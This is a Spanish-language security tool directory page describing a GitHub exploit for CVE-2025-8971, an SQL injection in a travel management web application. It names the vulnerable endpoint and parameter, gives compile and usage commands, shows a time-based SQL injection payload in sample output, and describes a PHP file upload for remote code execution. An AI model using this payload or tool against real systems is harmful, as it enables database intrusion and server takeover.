Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-8971 — Inyección SQL en itsourcecode Online Tour and Travel Management System 1.0. | Kitploit
Herramientas/GitHubGitHub/bytereaper77/cve-2025-8971
Generación de PayloadsAnálisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónArchived
GitHubbytereaper77/cve-2025-8971

CVE-2025-8971

Inyección SQL en itsourcecode Online Tour and Travel Management System 1.0.

Ver Repositorio
12hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-8971 (Inyección SQL)

Autor: Byte Reaper

Descripción :

Este exploit para CVE-2025-8971, una vulnerabilidad de inyección SQL en itsourcecode Online Tour and Travel Management System 1.0. La vulnerabilidad existe en /admin/operations/travellers.php y puede ser explotada remotamente a través del parámetro val-username.

Cómo funciona

El exploit envía solicitudes HTTP POST manipuladas a la URL objetivo.

Los payloads son codificados e inyectados en val-username.

Se puede usar una carga opcional de archivo (.php o imagen) para lograr ejecución remota de código.

El script verifica las respuestas para comprobar si el payload fue ejecutado exitosamente.

Requisitos :

root@kitploit:~
GCC compiler (gcc)

Linux x86_64 

ibcurl 

Compilación :

root@kitploit:~
    gcc script.c argparse.c -o CVE-2025-8971 -lcurl
    ./CVE-2025-8971 -u http://<target> -v [verbose mode]

Uso:

root@kitploit:~
    -h, --help            help message 
    -u, --url             Target Url (BASE URL)
    -c, --cookies         File cookies
    -i, --ip              Fake Ip (Host request)
    -f, --file            File upload (.php / image)
    -v, --verbose         Verbose Mode

Ejemplo de ejecución :

root@kitploit:~
[+] Start encode Payload in Request (username=)
[+] Encode Payload : AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))bAKL)%20AND%20'b'='b'
[+] Original Payload (Not encode) : AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'b'='b'
[+] POST Request Sent
[+] FULL URL : http://127.0.0.1/code/admin/operations/travellers.php
[+] File Upload : test.php
[+] File written successfully
....

Licencia :

MIT License

Descargar herramienta